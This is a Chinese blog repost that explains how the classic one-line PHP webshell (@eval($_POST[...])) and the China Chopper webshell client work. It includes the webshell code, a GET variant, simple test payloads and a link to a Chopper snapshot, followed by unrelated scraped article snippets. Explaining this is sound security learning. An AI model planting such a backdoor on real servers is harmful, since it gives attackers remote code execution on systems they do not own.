程序员经验分享-hwhale

一句话木马原理介绍和中国菜刀原理的介绍

2023-10-27

菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。
今天突然心血来潮写来研究一下一句话木马和菜刀的原理。
下面的原理是自己看其他大佬写的和自己总结的一些介绍。
希望能够帮助老表们~~~

一句话木马原理

我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。
我们来看一下经典的一句话木马

<?php
@eval($_POST['123']);
?>

  1. 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错!
    在这里插入图片描述这里是加了@,则不会进行报错
    在这里插入图片描述

  2. eval()函数是执行PHP代码的一个函数。意思就是eval函数里面如果是PHP代码,那么就可以执行。

  3. $_POST[‘123’]是可以进行一个提交POST参数的操作
    eg:
    123=phpinfo();
    123=echo “hacker by 111”;
    在这里插入图片描述在这里插入图片描述
    可以清楚的看到执行成功了!

错误操作:

最开始自己是进行的bp进行操作但是怎么也没有成功。
然后自己通过浏览器的hackbar进行操作提交,抓包发现http报文前面多加了一个
Content-Type: application/x-www-form-urlencoded
然后自己进行操作成功
在这里插入图片描述content-type的介绍
这里介绍2个常见的:
application/x-www-form-urlencoded
form表单数据被编码为key/value格式发送到服务器(表单默认的提交数据的格式)或者一种是常见的媒体格式是上传文件之时使用
multipart/form-data
需要在表单中进行文件上传时,就需要使用该格式(文件上传,上传一句话木马)

其实也可以进行GET方法获取 

<?php
@eval($_GET['123']);
?>

在这里插入图片描述其实思想就是:在客户端进行传递参数(php代码)然后通过eval()函数执行PHP代码。造成漏洞,但是一般都是进行POST方法。GET方法介绍是为了更好地理解原理

菜刀原理

菜刀原理介绍
这篇文章里面介绍的非常清楚,自己也进行了一次操作

里面的Wireshark过滤方法
eg:
ip.addr 192.168.0.15 and tcp.port80 and http
ip地址是自己进行操作电脑的ip

菜刀的原理简单的说就是构造http报文(里面是PHP代码)发送给服务器执行(脚本)php代码。

其实如果自己特别厉害,可以不需要菜刀就只要一个浏览器,自己写代码进行提交~~~

最后分享一个菜刀链接。
菜刀官方快照

总结

自己写这一篇文章的目的是为了自己更好的理解
和分享给朋友们,所谓的黑客精神就是分享~~~
希望朋友们希望!!!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

原理理解

php

安全

Web

一句话木马原理介绍和中国菜刀原理的介绍 的相关文章

  • 重定向后丢失会话变量

    用户填写用户名和密码 如果正确 页面会加载一些信息 例如user id到会话变量 该脚本制作了一个header Location 重定向 不知何故 下一页无法识别会话 怎么会 重定向到同一个域 并且所有页面都有session start 我

  • 未捕获的 ValueError:mysqli_stmt::execute():参数 #1 ($params) 必须是列表数组

    我试图通过这两个查询在我的数据库中插入准备好的语句多个值 这两个查询都发生故障 返回 未捕获的错误 调用未定义的方法 mysqli stmt bindValue 对于第一个代码或 未捕获的 ValueError mysqli stmt ex

  • 如何为 Lumen 的封闭路线指定路线名称?

    您好 我有以下流明路线 router gt get end function Illuminate Http Request request use router controller router gt app gt make App H

  • mongodb对话系统

    我正在实施一个verymongodb 上的简单对话系统 这个想法应该是 当我打开一个 convo 时 它应该显示发送和接收的消息 到目前为止一切正常 并且应该非常容易 通过使用像这样的伪代码这样的简单查询 from my id AND to

  • Symfony php.ini Debian

    我在 Oracle VM VirtualBox 上使用 Debian 7 amd64 LAMP 服务器 我正在尝试安装 Symfony 但遇到了一些小问题 当我运行命令时 php my project name app check php

  • Laravel 5 与 SAML 2 和现有 IDP 集成

    我使用 Laravel 5 我正在尝试将 SAML 2 0 与其集成 我找到了这个包 https github com aacotroneo laravel saml2 https github com aacotroneo laravel

  • PSR-4 代码库中条令生成器的解决方法

    在 Windows 机器上使用 Symfony 2 和 Doctrine 我正在尝试 从现有模式生成实体 php app console doctrine mapping import force CoreBundle annotation

  • 如何从字符串中只获取数字? [复制]

    这个问题在这里已经有答案了 我有这样的字符串 第 001 课 完成 在这种情况下 我只想获取数字部分001 我试过这个 str the title preg match all d str matches number implode ma

  • 一次将多个值插入MySQL [重复]

    这个问题在这里已经有答案了 谁能解释一下为什么这个 PHP MySQL 不起作用 基本上我需要从表单中一次插入大量行 因此会有多个名称字段 多个短 中 长字段等 我收到此错误 Notice Undefined variable Short1

  • 如何将 ctype_alpha 与 UTF-8 结合使用

    如何将 ctype alpha 与 UTF 8 一起使用 我有这个代码 if empty POST false if isset POST first name empty POST first name if ctype alpha PO

  • 需要 mysqli_fetch_all 的替代方案

    我有一个 php mysqli 代码 可以找到一个我的本地服务器 但是在我的服务器上使用它时 我得到了一个 Fatal error Call to undefined function mysqli fetch all in home3 t

  • Yii2 DropDownList Onchange 更改自动完成小部件“源”属性?

    我已经尝试过这个 yii2 依赖的自动完成小部件 https stackoverflow com questions 27025791 yii2 dependent autocomplete widget 但我不知道为什么它不起作用 这是我

  • 疯狂的 crond 行为。不断使 bash 进程失效

    我有一个看起来像这样的 crontab SHELL bin bash PATH sbin bin usr sbin usr bin MAILTO root HOME 0 59 var www html private fivemin zda

  • 在 MySQL 中搜索多个单词

    我使用 HTML 表单来允许用户查找数据库表中的条目

  • 避免 SQLite3 中的 SQL 注入

    我正在尝试找出一种避免 SQL 注入的好简单方法 到目前为止我只能提出两个想法 对用户输入进行 Base64 编码 其实不想这样做 使用正则表达式删除不需要的字符 目前正在使用这个 不确定是否100 安全 这是我当前的代码

  • php,in_array,0值

    我试图理解in array下一个场景的行为 arr array 2 gt Bye 52 77 3 gt Hey var dump in array 0 arr 返回值in array 是布尔值true 正如你所看到的no值等于0 所以有人可

  • $_SESSION 中保存大量信息可以吗?

    我需要存储许多数组 SESSION以防止从 MySQL 检索信息 可以吗 其中 太多 的信息有多少 SESSION还是没有 太多 谢谢 附 或者更好地使用http php net manual en book memcache php ht

  • NodeJS 和 PHP (Laravel) 集成用于 Socket.IO 实时聊天

    目前我有一个我写过的网站PHP通过Laravel 框架 我已经使用写了一个实时聊天nodeJS with 套接字IO and Express现在我想做的是将它集成到我已经编写的 Laravel 网站中 问题是聊天必须在主页中 当前由 Lar

  • PHP 除法浮点值问题

    当我尝试获取余数时 它给出了无效值 我试图获得两位小数的余数 我得到 3 4694469519536E 18 我的价值观是 x 0 1 y 0 005 我尝试了以下方法 echo ed fmod 0 1 0 005 OutPut 3 469

  • PHP 中的 Zip 流

    我有一个 PHP 脚本 可以动态创建 zip 文件并强制浏览器下载该 zip 文件 问题是 我可以直接将zip文件写入连接到用户浏览器的输出流 而不是先将其保存为服务器上的真实文件 然后发送文件吗 提前致谢 如果您的 Web 服务器运行的是

随机推荐

  • OLED透明屏拼缝技术:创新的显示解决方案

    引言 OLED透明屏作为一种创新的显示技术 已经在各个领域展现出了巨大的潜力 而其中的拼缝技术更是为OLED透明屏的应用带来了全新的可能性 对此 尼伽便大家具体介绍一下OLED透明屏拼缝技术的概念 优势以及应用领域 并探讨其在当前市场中的发

  • 2023初级Java工程师面试题及答案

    2023初级Java工程师面试题及答案 一 选择题 1 下面哪种是正确的创建Map集合的方式 2 下面程序段运行结果是什么 3 Linux系统中关于进程与线程的描述错误的是 5 初始化一个C程序二维数组代码如 6 单向链表已经可以实现非连续

  • 软件构造笔记:Java枚举

    在软件构造中 适当使用枚举类型可以方便客户端的使用 文章目录 Java 枚举 enum 内部类中使用枚举 迭代枚举元素 在 switch 中使用枚举类 枚举类成员 Java 枚举 enum Java 枚举是一个特殊的类 一般表示一组常量 比

  • 全民日志组件 Apache Log4j2 爆发漏洞,赶紧加班修复

    Java学习路线配套文章 Java学习路线总结 搬砖工逆袭Java架构师 全网最强 基础推荐 Java基础教程系列 实战推荐 Spring Boot基础教程 简介 Java领域优质创作者 CSDN哪吒公众号作者 Java架构师奋斗者 扫描主

  • Redis 排行榜 相同分数根据时间优先排行

    1 需求 Redis 提供了按分数进行排序的有序集合 比如在游戏里面 比如战斗力排行 充值排行 用默认的Redis 实现就可以达到需求 但是 比如等级排行 大家都是30级 谁先到30级谁第一 Redis 默认实现是 相同分数的成员按字典顺序

  • 一个简单的BP神经网络matlab程序(附函数详解)

    说明 20180604更新 1 此文的程序来自博客 http www cnblogs com heaad archive 2011 03 07 1976443 html 2 本人对其中涉及到的函数进行了详细说明 3 此程序中部分函数的使用方

  • 数据绑定多记录 Web 服务器控件

    Visual Basic 和 Visual C 概念 数据绑定多记录 Web 服务器控件 多记录控件 例如 Repeater DataList DataGrid ListBox CheckBoxList 和 RadioButtonList

  • js中时间转换为date型

    若显示为YYYY MM DD HH mm ss格式 调用如下方法 datetimeFormat longTypeDate 若显示为YYYY MM DD格式 调用如下方法 dateFormat longTypeDate Js中具体方法如下 时

  • 学习笔记(109):R语言入门基础-text函数

    立即学习 https edu csdn net course play 24913 285853 utm source blogtoedu text函数 text x y labels x y是数据向量 labels可以是整数 也可以是字符

  • 华师大版数学分析下知识点总结

    本篇为数分专栏的索引 考前复习 考前主要知识点总结 数分下例题 知识点 11反常积分 反常积分 12章数项级数 数项级数收敛判别 13章函数列和函数项级数 函数列和函数项级数的收敛判别 四个收敛的关系 14章幂级数 幂级数知识点 15章傅里

  • 程序环境和预处理

    目录 一 程序的翻译环境和执行环境 二 详解编译 链接 2 1 翻译环境 2 2 编译本身也分为几个阶段 2 3 运行环境 三 预处理详解 3 1 预定义符号 3 2 define 定义标识符 3 3 define 定义宏 3 4 defi

  • 使用SeruTek超高速TDC 测量PCIE spread spectrum clock

    目录 SeruTek TDC 简介 超高速TDC评估与测试 测试平台 PCIE Spread Spectrum Clock SSC 简介 测试目的 测试内容 测试结果汇总 第一轮测试 单频点测试 扩频测试 第二轮测试 单频点测试 扩频测试

  • nginx反向代理,request.getServerName()的问题

    前几天配置了nginx的反向代理 可是有个问题 在项目中 写request getServerName 的时候 总是返回的127 0 0 1 这个地址 折腾的好久 今天搜了搜 发现是配置的原因 记载一下 我以前的配置 location pr

  • 服务器环境配置(CentOS7)

    文章目录 虚拟机网络配置 Java8安装配置 Scala安装配置 MySQL安装配置 Redis安装配置 Nginx安装配置 Zookeeper安装配置 Kafka安装配置 ElasticSearch 安装配置 ElasticSearch

  • mysql 收集状态和性能数据的脚本来自于高性能mysql

    mysql 收集状态和性能数据的脚本 bin sh x INTERVAL 10 PASSWORD uroot proot PREFIX INTERVAL sec status RUNFILE home benchmarks running

  • Element-ui 之 解决后端返回大量数据时页面卡顿或者反应慢的问题(懒加载以及下拉框回显未加载数据)

    在我们实际开发中 常常需要优化以下页面 加快页面的响应速度 下面来介绍一下 前端在使用 Element ui 下拉框时使用懒加载来解决页面卡顿或者响应慢的问题 场景描述 场景描述一 当后端给前端返回的数据有很多成千上万个数据时 我们如果直接

  • ADC转换后的值推算还原实际测量电量

    ADC转换后的值推算还原实际测量电量 1 确定ADC用几位表示 最大数值是多少 例如一个8位的ADC 最大值是0XFF 就是255 2 确定最大值时对应的参考电压值 一般而言最大值对应5V 具体需参考芯片ADC模块的说明 寄存器有对于输入信

  • 完全背包算法——蓝桥杯——(C语言)

    问题描述 有一個背包 容量為M 有N種物品 每種物品有其體積Wi與價值Vi 將這些物品的一部分放入背包 每種物品可以放任意多個 要求總體積不超過容量 且總價值最大 输入格式 第一行為N M 之後N行 每行為Wi Vi 输出格式 一個數 為最

  • Unity jobsystem 和 burst编译器代码演示及效率测试

    Unity jobsystem 和 burst编译器代码演示及效率测试 最近看了相关内容做了个测试 直接上代码 using System Collections using System Collections Generic using

  • 一句话木马原理介绍和中国菜刀原理的介绍

    菜刀 c刀 蚁剑都使用过 而且他们的方法基本上差不多 今天突然心血来潮写来研究一下一句话木马和菜刀的原理 下面的原理是自己看其他大佬写的和自己总结的一些介绍 希望能够帮助老表们 一句话木马原理 我这里就分析一下PHP代码 其他代码基本上差不

热门标签